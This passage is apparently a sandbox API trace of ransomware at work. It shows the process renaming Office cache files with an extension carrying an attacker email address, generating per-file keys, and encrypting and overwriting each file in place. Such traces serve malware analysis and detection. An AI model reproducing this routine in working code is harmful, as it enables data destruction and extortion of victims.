	[0082.842] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", dwFileAttributes=0x80) returned 1
	[0082.842] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 76
	[0082.842] GetProcessHeap () returned 0x540000
	[0082.843] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0082.843] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll"
	[0082.843] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.843] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.845] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.845] GetProcessHeap () returned 0x540000
	[0082.845] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.845] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=191872) returned 1
	[0082.845] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2ed80
	[0082.845] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.845] GetProcessHeap () returned 0x540000
	[0082.845] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.845] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.845] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.847] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.847] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.847] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2ed80) returned 0x3790048
	[0082.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2ed80) returned 0x37bedd0
	[0082.848] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.848] ReadFile (in: hFile=0x48c, lpBuffer=0x3790048, nNumberOfBytesToRead=0x2ed80, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesRead=0x3a1f778*=0x2ed80, lpOverlapped=0x0) returned 1
	[0082.855] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-191872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.855] WriteFile (in: hFile=0x48c, lpBuffer=0x37bedd0*, nNumberOfBytesToWrite=0x2ed80, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37bedd0*, lpNumberOfBytesWritten=0x3a1f778*=0x2ed80, lpOverlapped=0x0) returned 1
	[0082.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3790048 | out: hHeap=0x540000) returned 1
	[0082.856] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x37bedd0 | out: hHeap=0x540000) returned 1
	[0082.856] CloseHandle (hObject=0x48c) returned 1
	[0082.858] GetProcessHeap () returned 0x540000
	[0082.858] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.858] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.858] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.858] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbb90 | out: hHeap=0x540000) returned 1
	[0082.858] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fba28 | out: hHeap=0x540000) returned 1
	[0082.858] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598df8
	[0082.858] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.858] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.858] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.858] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.858] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", dwFileAttributes=0x80) returned 1
	[0082.858] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 80
	[0082.858] GetProcessHeap () returned 0x540000
	[0082.858] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106) returned 0x5fba28
	[0082.858] lstrcpyW (in: lpString1=0x5fba28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml"
	[0082.858] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.858] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.861] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.861] GetProcessHeap () returned 0x540000
	[0082.861] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fba28 | out: hHeap=0x540000) returned 1
	[0082.861] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=819) returned 1
	[0082.861] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x333
	[0082.861] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.861] GetProcessHeap () returned 0x540000
	[0082.861] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.861] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.861] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.863] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.863] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x333) returned 0x5fdb78
	[0082.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x333) returned 0x5fdeb8
	[0082.863] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.863] ReadFile (in: hFile=0x48c, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x333, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x333, lpOverlapped=0x0) returned 1
	[0082.863] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-819, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.863] WriteFile (in: hFile=0x48c, lpBuffer=0x5fdeb8*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdeb8*, lpNumberOfBytesWritten=0x3a1f778*=0x333, lpOverlapped=0x0) returned 1
	[0082.863] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0082.863] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdeb8 | out: hHeap=0x540000) returned 1
	[0082.863] CloseHandle (hObject=0x48c) returned 1
	[0082.864] GetProcessHeap () returned 0x540000
	[0082.864] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.864] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.864] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.864] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598df8 | out: hHeap=0x540000) returned 1
	[0082.864] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0082.864] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0082.864] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.864] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.864] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.864] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.864] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi", dwFileAttributes=0x80) returned 1
	[0082.864] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 80
	[0082.865] GetProcessHeap () returned 0x540000
	[0082.865] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x106) returned 0x5fba28
	[0082.865] lstrcpyW (in: lpString1=0x5fba28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi"
	[0082.865] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.865] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.867] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.867] GetProcessHeap () returned 0x540000
	[0082.867] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fba28 | out: hHeap=0x540000) returned 1
	[0082.867] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=868864) returned 1
	[0082.867] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd4200
	[0082.867] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.867] GetProcessHeap () returned 0x540000
	[0082.867] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.867] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.867] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.869] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.869] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4200) returned 0x3a20020
	[0082.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4200) returned 0x3b00020
	[0082.870] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.870] ReadFile (in: hFile=0x48c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0xd4200, lpOverlapped=0x0) returned 1
	[0082.906] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.906] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.906] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", dwFileAttributes=0x80) returned 1
	[0082.908] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 77
	[0082.908] GetProcessHeap () returned 0x540000
	[0082.908] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8568
	[0082.908] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml"
	[0082.908] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.908] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.910] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.910] GetProcessHeap () returned 0x540000
	[0082.910] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.910] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=5557) returned 1
	[0082.910] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x15b5
	[0082.910] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.910] GetProcessHeap () returned 0x540000
	[0082.910] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.910] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.911] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.912] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.912] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.912] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x15b5) returned 0x5fdb78
	[0082.912] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x15b5) returned 0x5ff138
	[0082.912] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.912] ReadFile (in: hFile=0x48c, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x15b5, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x15b5, lpOverlapped=0x0) returned 1
	[0082.915] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-5557, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.915] WriteFile (in: hFile=0x48c, lpBuffer=0x5ff138*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ff138*, lpNumberOfBytesWritten=0x3a1f778*=0x15b5, lpOverlapped=0x0) returned 1
	[0082.915] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0082.915] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ff138 | out: hHeap=0x540000) returned 1
	[0082.916] CloseHandle (hObject=0x48c) returned 1
	[0082.917] GetProcessHeap () returned 0x540000
	[0082.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbb90 | out: hHeap=0x540000) returned 1
	[0082.917] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb980 | out: hHeap=0x540000) returned 1
	[0082.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbb90
	[0082.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.917] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.917] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.917] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.917] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", dwFileAttributes=0x80) returned 1
	[0082.918] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 77
	[0082.918] GetProcessHeap () returned 0x540000
	[0082.918] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8568
	[0082.918] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi"
